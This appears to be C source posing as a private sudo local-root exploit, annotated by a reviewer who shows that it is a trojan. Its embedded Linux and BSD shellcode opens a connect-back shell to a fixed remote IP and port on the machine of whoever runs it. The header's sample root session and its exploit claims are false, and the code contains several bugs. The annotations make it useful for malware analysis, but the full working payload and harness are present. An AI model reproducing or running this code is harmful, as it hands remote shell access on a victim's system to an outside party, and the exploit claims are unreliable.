kw3rln

Priv8 Version of local exploit SUDO


/**************************************************************
PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE
PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE

* sudo 1.6.8p9 - p12+++ local root
* by HST - Hezuah Security Team Iran
*
* PRIVATE --- DO NOT DISTRIBUTE
*
* Uses sudo's insecure temp file to feed a
* buffer overflow. Exploitation:
* izik's method of using JMP %ESP for
* linux-gate.so.1. Searches for JMP %ESP, very
* reliable. The exploit also works for *BSD,
* but you have to modify -g to get it to work.
* Values of 0xbf0caa2b for FreeBSD 6 work.
*
* $ ./spwn -f /tmp/fakefile
* [+] Starting up...
* [+] Finding offset
* [+] Found JMP %ESP @ 0xffffe75f
* [+] Calculating header
* [+] Child calculations
* [+] Writing malicious tmp file
* [+] Getting child offset
* [+] Final value for offset: 0xffffe75f
* # whoami
* root
* #
*
* or ./spwn -f /tmp/fakefile -g 0xbf0caa2b
*
*
* linux-gate: [url]http://www.milw0rm.com/papers/55[/url]
*
* ~censored~ whitehats - hack the planet: #hezuah

PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE
PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE
**************************************************************/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <sys/utsname.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <signal.h>
#include <sys/time.h>
#include <time.h>

/*
 * lincode: x86 Linux payload.  sudo_own() copies it into its buffer and ALSO
 * calls it directly through a function pointer in the forked child, so it runs
 * in the process of whoever executes this program.  Decoded by hand (verify
 * with a disassembler): socketcall/socket(AF_INET, SOCK_STREAM, 0); dup2() the
 * socket onto fds 2, 1, 0; connect() to the sockaddr_in assembled from the
 * pushes "\x42\x0b\x75\xb6" (66.11.117.182) and "\x23\x29" (port 9001);
 * execve("/bin//sh").  I.e. a connect-back shell to a fixed remote host — the
 * program's actual function, regardless of what the header claims.
 */
unsigned char lincode[] =
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x89\xe1\xcd\x80\x93\x59"
"\xb0\x3f\xcd\x80\x49\x79\xf9\x5b\x5a\x68\x42\x0b\x75\xb6\x66\x68"
"\x23\x29\x43\x66\x53\x89\xe1\xb0\x66\x50\x51\x53\x89\xe1\x43\xcd"
"\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
"\x89\xe1\xb0\x0b\xcd\x80";

/*
 * bsdcode: the *BSD variant of the same payload, selected when uname()
 * reports a sysname containing "BSD".  Same remote endpoint: the address bytes
 * "\x42\x0b\x75\xb6" and port "\x23\x29" appear again, here preceded by the
 * "\x10\x02" sin_len/sin_family prefix; then dup2 loop and execve("/bin//sh").
 */
unsigned char bsdcode[] =
"\x6a\x61\x58\x99\x52\x42\x52\x42\x52\x68\x42\x0b\x75\xb6\xcd\x80"
"\x68\x10\x02\x23\x29\x89\xe1\x6a\x10\x51\x50\x51\x97\x6a\x62\x58"
"\xcd\x80\x6a\x02\x59\xb0\x5a\x51\x57\x51\xcd\x80\x49\x79\xf6\x50"
"\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x53"
"\xb0\x3b\xcd\x80";

/* OS selector values stored in the global OS by main() */
#define OS_LINUX 0
#define OS_BSD 1
/* only ever used as CMD+offset in sudo_own()'s child, i.e. as a pointer far past the literal */
#define CMD "/bin/sh"

int OS;                    /* set once in main() from uname().sysname */
char **k;                  /* assigned argv in main(); never read in this file */
unsigned long BSDoffset;   /* never referenced in this file */

//sighandler_t sighandle(int a)
//{
// return;
//}

/*
 * find_esp - scan the 4096 bytes starting at `offset` for the byte pair
 * 0xff 0xe4 and return the address of the first match, or `offset` itself
 * when nothing matches.
 *
 * NOTE(review): this function is never called anywhere in this file, so the
 * "[+] Found JMP %ESP" line in the header's sample run cannot be produced by
 * this program as written.  Dereferencing an arbitrary address like this
 * faults (SIGSEGV) on any unmapped page, and the printf passes a char* to
 * %08x, a format/argument mismatch.
 */
unsigned long find_esp(unsigned long offset) {
int i;
char *ptr = (char *) offset;

for (i = 0; i < 4095; i++) {
if (ptr[i] == '\xff' && ptr[i+1] == '\xe4') {
printf("[+] Found JMP %%ESP @ 0x%08x\n", ptr+i);
/* parses as ((unsigned long)ptr) + i — same value as the address printed */
return (unsigned long) ptr+i;
}
}

printf("[-] Didn't find JMP %%ESP, but trying anyway...\n");
return ((unsigned long)ptr);
/* sometimes this actually works, why? */
}

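/*
 * revert - reverse the byte order of every complete 32-bit word in p[0..size).
 *
 * p     buffer to modify in place
 * size  number of bytes in the buffer that may be touched
 *
 * Only whole 4-byte words are swapped; a trailing 1-3 bytes are left as they
 * are.  The previous version looped with `p <= end`, which also swapped the
 * four bytes starting AT p+size, i.e. wrote past the range the caller handed
 * in (for size == 16 that touched p[16..19]).  This version stays inside
 * the stated range.  Plain temporaries replace the XOR-swap trick, which is
 * no faster and silently zeroes a byte if the two addresses ever coincide.
 */
void revert(char *p, unsigned int size)
{
    char *end = p + (size - size % 4);  /* first byte after the last complete word */

    for (; p < end; p += 4) {
        char tmp = p[0];
        p[0] = p[3];
        p[3] = tmp;

        tmp = p[1];
        p[1] = p[2];
        p[2] = tmp;
    }
}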

/*
 * set_bytes - store the low 32 bits of `word` into o[0..3], least-significant
 * byte first (little-endian), one byte per iteration.
 *
 * o     destination; must have room for 4 bytes
 * word  value to serialise; bits above 31 are ignored
 */
void set_bytes(char *o, long word)
{
    for (int shift = 0; shift < 32; shift += 8) {
        *o++ = (word >> shift) & 0xff;
    }
}

/*
 * sudo_own - build the `own` buffer, fork, and in the child run the embedded
 * payload.
 *
 * NOTE(review): nothing in here exploits sudo.  The child executes
 * lincode/bsdcode directly through the get_bytes function pointer (see the
 * `offset = get_bytes();` line), which is a connect-back shell to the host
 * encoded in those arrays — so the person running this program is the one
 * who gets the payload.  Meanwhile the parent, for the default offset, fails
 * the `offset % 51` check at the bottom and exit()s, so main()'s execl of
 * sudo is never reached.
 *
 * file    path used for the tmp-file name and as the source of an unbounded
 *         strcpy into `own`
 * offset  intended address; only its low bit is actually examined (see below)
 * mode    unused
 * ovr     added to getuid() when forming the tmp-file name
 * returns own (heap, never freed here); may exit(0) instead
 */
char *sudo_own(char *file, unsigned long offset,int mode,int ovr)
{
char *own = NULL;
/* room for "<file>.<uid>.<time>"; calloc result is not checked */
char *file_ = calloc(strlen(file) + 20,sizeof(char));
/* points at the global shellcode array itself, not the copy made into own */
int (*get_bytes)();
int cnt = 0;
int fp;              /* a file descriptor, despite the name */
struct timeval tv;

/* Precedence bug: != binds tighter than &, so this reads as
   (offset & (0xffff != 0xe000)) || (offset & (0xffff0000 != 0xffff0000))
   == (offset & 1) || 0.  Only an ODD offset is replaced; 037777760000 is
   octal for 0xffffe000. */
if(offset & 0xffff != 0xe000 || offset & 0xffff0000 != 0xffff0000)
offset = 037777760000;
printf("[+] Starting up...\n");

/* own = 24 header bytes + a copy of the payload; get_bytes aims at the global */
if(OS == OS_LINUX)
{
own = malloc(sizeof(lincode) + 25);
memcpy(own+24,lincode,sizeof(lincode)); get_bytes = (int(*)())lincode;
}
else
{
own = malloc(sizeof(bsdcode) + 25);
memcpy(own+24,bsdcode,sizeof(bsdcode)); get_bytes = (int(*)())bsdcode;
}

/* No search happens here (find_esp is never called).  The offset is stored
   at own+4 twice: first at native width, then again as 4 little-endian bytes. */
printf("[+] Finding offset\n");
memcpy(own+4,&offset,sizeof(unsigned long));
set_bytes(own + 4,offset);

/* `0xff & cnt` binds first, so each byte gets (offset ^ cnt) truncated to char */
printf("[+] Calculating header\n");
for(cnt = 0; cnt < 16; cnt++)
own[cnt] += (offset ^ 0xff & cnt);
/* cnt == 16 here */
revert(own,cnt);

/* Unbounded copy.  own is sizeof(payload)+25 bytes, so a path longer than
   sizeof(payload)+8 bytes overruns the heap block; any path of 8 or more
   characters already overwrites the payload copy that starts at own+24. */
strcpy(own + 16,file);

if(!fork())
{
cnt = 0;
//signal(1,sighandle); signal(2,sighandle);
printf("[+] Child calculations\n");
/* tmp name = "<file>.<uid+ovr>.<tv_sec with the low 9 bits cleared>";
   %d with a time_t is a format mismatch */
gettimeofday(&tv,NULL);
tv.tv_sec &= 0xfffffe00;
snprintf(file_,strlen(file) + 20,"%s.%d.%d",file,getuid() + ovr,tv.tv_sec);
/* O_CREAT with no mode argument (permissions come from garbage), and no
   O_WRONLY/O_RDWR, so the write() below fails on a read-only descriptor;
   its return value is ignored anyway. */
if((fp = open(file_,O_CREAT | O_EXCL)) == -1)
_exit(-1);

printf("[+] Writing malicious tmp file\n");
write(fp,own,30);

printf("[+] Getting child offset\n");
close(fp);
/* THE ACTUAL PAYLOAD: transfers control into lincode/bsdcode inside this
   process.  On success that code execve()s a shell and never returns; on a
   system that enforces a non-executable data segment it faults instead. */
offset = get_bytes();

/* Only reached if the payload returns.  execl here has no argv[0] and no
   terminating NULL (execl reads arguments until it sees one), and CMD+offset
   points far outside the "/bin/sh" literal. */
execl("/usr/sbin/sudo","-z","--tmpfile",file,CMD+offset);
}

/* Parent.  `offset` was only ever reassigned in the child, so it is unchanged
   here.  cnt is 16, so ++cnt * 3 == 51; the default 0xffffe000 % 51 == 20,
   which is non-zero, so the parent prints the message and exit(0)s — the
   return below, and main()'s execl, are reached only for an offset that is
   a multiple of 51. */
sleep(1);
printf("[+] Final value for offset: 0x%08x\n",offset);
if(offset % (++cnt * 3))
printf("[-] Improper value for offset, try -g, -t, or -o\n"),exit(0);

return own;
}

/*
 * main - parse options, choose the payload by OS name, and exec sudo with
 * whatever sudo_own() returns.
 *
 * NOTE(review): for the default offset sudo_own() exit()s the parent, and its
 * forked child runs the embedded shellcode (see sudo_own), so in practice the
 * execl below is not reached and the program's effect is the child's payload.
 *
 * Options: -f file (required), -g 0xADDR, -t and -o (passed to sudo_own as
 * mode/ovr; mode is unused there), -h/-v print one line and exit.
 */
int main(int argc, char **argv)
{
int c = 0;
char *file = NULL;
unsigned long offset = 0xffffe000;   /* default; see the odd-bit check in sudo_own */
struct utsname u;

int t_mode = 0, try_overwrite = 0;
k = argv;   /* global is never read in this file */

while((c = getopt(argc,argv,"hvf:g:to")) != -1)
{
switch(c)
{
case 'h':
case 'v':
printf("~censored~ read the source code\n");
exit(0);
case 'f':
file = optarg;
break;
case 'g':

/* Skips an assumed "0x" prefix without checking the argument's length:
   an argument shorter than 2 chars makes optarg+2 point past its NUL. */
offset = strtoul(optarg+2,NULL,16);
break;
case 't':
t_mode = 1;
break;
case 'o':
try_overwrite = 1;
break;
default:
goto START;   /* any unknown option stops parsing rather than aborting */
}
}
START:
if(file == NULL)
fprintf(stderr,"specify a file with -f\n"),exit(-1);

/* uname() return value unchecked; u.sysname is read regardless */
uname(&u);
if(strstr(u.sysname,"BSD") != NULL)
OS = OS_BSD;
else
OS = OS_LINUX;

/* execl with no argv[0] slot and no terminating NULL (execl reads arguments
   until it finds one) — undefined behavior even if this line were reached.
   sudo_own() is evaluated as an argument, so its fork/exit happen first. */
execl("/usr/sbin/sudo","-b","-z",
sudo_own(file,offset,t_mode,try_overwrite));
perror("execl");

return 0;
}
